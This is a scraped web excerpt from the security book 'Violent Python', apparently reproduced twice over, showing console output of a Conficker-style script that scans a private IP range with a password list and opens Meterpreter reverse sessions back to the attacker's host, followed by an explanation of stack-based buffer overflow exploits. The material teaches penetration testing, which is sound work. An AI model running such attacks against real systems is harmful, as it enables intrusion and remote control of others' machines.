Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor Page A
Authors: TJ O'Connor
Ads: Link
In the following section, we will construct our own zero-day attack.
attacker# python conficker.py -H 192.168.1.30-50 -l 192.168.1.3 -F passwords.txt
[+] Found Target Host: 192.168.1.35
[+] Found Target Host: 192.168.1.37
[+] Found Target Host: 192.168.1.42
[+] Found Target Host: 192.168.1.45
[+] Found Target Host: 192.168.1.47
<..SNIPPED..>
[∗] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[∗] Attempting to trigger the vulnerability...
[∗] Sending stage (752128 bytes) to 192.168.1.37
[∗] Meterpreter session 1 opened (192.168.1.3:1337 -> 192.168.1.37:1087) at Sat Jun 23 16:25:05 -0700 2012
<..SNIPPED..>
[∗] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[∗] Attempting to trigger the vulnerability...
[∗] Sending stage (752128 bytes) to 192.168.1.42
[∗] Meterpreter session 1 opened (192.168.1.3:1337 -> 192.168.1.42:1094) at Sat Jun 23 15:25:09 -0700 2012
Writing Your Own Zero-Day Proof of Concept Code
The preceding section and the Conficker worm made use of a stack corruption vulnerability. While the Metasploit Framework contains over eight hundred unique exploits in its arsenal, you may encounter a time when you have to write your own remote code execution exploit. This section explains how Python can help simplify that process. In order to do so, lets begin by understanding stack-based buffer overflows.
The Morris Worm succeeded in part because of a stack-based buffer overflow against the Finger service ( US v. Morris, 1991 ). This class of exploits succeeds because a program fails to sanitize or validate a user input. Although the Morris Worm made use of a stack-based buffer overflow attack in 1988, it was not until 1996 that Elias Levy (a.k.a. Aleph One) published the seminal paper, “Smashing the Stack for Fun and Profit” in Phrack Magazine ( One, 1996 ). If you feel unfamiliar with how stack-based buffer overflow attacks work or would like to learn more, consider reading Elias’s paper. For our purposes, wewill take the time to illustrate only the key concepts behind a stack-based buffer overflow attack.
Stack-Based Buffer Overflow Attacks
In the case of a stack-based buffer overflow, unchecked user data overwrites the next instruction pointer [EIP] to take control of a program’s flow. The exploit directs the EIP register to point to a location containing shellcode inserted by the attacker. A series of machine code instructions, shellcode, can allow the exploit to add an additional user on to the target system, make a network connection with the attacker, or download a stand-alone executable. Endless shellcode possibilities exist, solely depending on the size of available space in memory.
More Information…
Essential elements of stack-based buffer overflow exploit
Overflow: user input that exceeds the expected value allotted in the stack.
Return Address: The 4-byte address used to jump directly to the top of the stack. In the following exploit, we use a 4-byte address that points to a JMP ESP instruction in the kernel32.dll.
Padding: A series of NOP (no operation) instructions that precedes the shellcode, allowing an attacker to guestimate the address location to jump directly to. If an attacker lands anywhere in the NOP-sled, he slides directly into the shellcode.
Shellcode: A small piece of code written in assembly machine code. In the following example, we generated shellcode using the Metasploit framework.
While many methods for writing exploits exist today, stack-based buffer overflows provided the original exploit vector. However, an abundance of these exploits exist today and continue to grow. In July of 2011, an acquaintance of mine posted an exploit for a vulnerable FTP server to packetstorm ( Freyman, 2011 ). Although the development of the exploit may appear to be a complex task, the actual attack contains less than eighty lines of code (including about thirty lines of shell code).
Adding the Key Elements of the
attacker# python conficker.py -H 192.168.1.30-50 -l 192.168.1.3 -F passwords.txt
[+] Found Target Host: 192.168.1.35
[+] Found Target Host: 192.168.1.37
[+] Found Target Host: 192.168.1.42
[+] Found Target Host: 192.168.1.45
[+] Found Target Host: 192.168.1.47
<..SNIPPED..>
[∗] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[∗] Attempting to trigger the vulnerability...
[∗] Sending stage (752128 bytes) to 192.168.1.37
[∗] Meterpreter session 1 opened (192.168.1.3:1337 -> 192.168.1.37:1087) at Sat Jun 23 16:25:05 -0700 2012
<..SNIPPED..>
[∗] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[∗] Attempting to trigger the vulnerability...
[∗] Sending stage (752128 bytes) to 192.168.1.42
[∗] Meterpreter session 1 opened (192.168.1.3:1337 -> 192.168.1.42:1094) at Sat Jun 23 15:25:09 -0700 2012
Writing Your Own Zero-Day Proof of Concept Code
The preceding section and the Conficker worm made use of a stack corruption vulnerability. While the Metasploit Framework contains over eight hundred unique exploits in its arsenal, you may encounter a time when you have to write your own remote code execution exploit. This section explains how Python can help simplify that process. In order to do so, lets begin by understanding stack-based buffer overflows.
The Morris Worm succeeded in part because of a stack-based buffer overflow against the Finger service ( US v. Morris, 1991 ). This class of exploits succeeds because a program fails to sanitize or validate a user input. Although the Morris Worm made use of a stack-based buffer overflow attack in 1988, it was not until 1996 that Elias Levy (a.k.a. Aleph One) published the seminal paper, “Smashing the Stack for Fun and Profit” in Phrack Magazine ( One, 1996 ). If you feel unfamiliar with how stack-based buffer overflow attacks work or would like to learn more, consider reading Elias’s paper. For our purposes, wewill take the time to illustrate only the key concepts behind a stack-based buffer overflow attack.
Stack-Based Buffer Overflow Attacks
In the case of a stack-based buffer overflow, unchecked user data overwrites the next instruction pointer [EIP] to take control of a program’s flow. The exploit directs the EIP register to point to a location containing shellcode inserted by the attacker. A series of machine code instructions, shellcode, can allow the exploit to add an additional user on to the target system, make a network connection with the attacker, or download a stand-alone executable. Endless shellcode possibilities exist, solely depending on the size of available space in memory.
More Information…
Essential elements of stack-based buffer overflow exploit
Overflow: user input that exceeds the expected value allotted in the stack.
Return Address: The 4-byte address used to jump directly to the top of the stack. In the following exploit, we use a 4-byte address that points to a JMP ESP instruction in the kernel32.dll.
Padding: A series of NOP (no operation) instructions that precedes the shellcode, allowing an attacker to guestimate the address location to jump directly to. If an attacker lands anywhere in the NOP-sled, he slides directly into the shellcode.
Shellcode: A small piece of code written in assembly machine code. In the following example, we generated shellcode using the Metasploit framework.
While many methods for writing exploits exist today, stack-based buffer overflows provided the original exploit vector. However, an abundance of these exploits exist today and continue to grow. In July of 2011, an acquaintance of mine posted an exploit for a vulnerable FTP server to packetstorm ( Freyman, 2011 ). Although the development of the exploit may appear to be a complex task, the actual attack contains less than eighty lines of code (including about thirty lines of shell code).
Adding the Key Elements of the
Similar Books
